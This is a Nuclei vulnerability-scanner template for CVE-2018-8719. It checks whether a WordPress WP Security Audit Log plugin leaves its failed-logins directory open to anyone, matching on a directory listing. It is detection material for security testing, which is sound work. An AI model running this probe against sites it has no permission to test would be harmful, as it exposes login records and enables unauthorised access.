nuclei-templates/cves/2018/CVE-2018-8719.yaml

40 lines
1.2 KiB
YAML

id: CVE-2018-8719
info:
name: WordPress WP Security Audit Log 3.1.1 - Information Disclosure
author: LogicalHunter
severity: medium
description: |
WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.exploit-db.com/exploits/44371
- https://vuldb.com/?id.115817
- https://www.exploit-db.com/exploits/44371/
- https://nvd.nist.gov/vuln/detail/CVE-2018-8719
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-8719
cwe-id: CWE-532
tags: cve2018,exposure,edb,wordpress,wp-plugin,cve
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[TXT]"
- ".log"
- "Index of"
condition: and
# Enhanced by md on 2023/01/30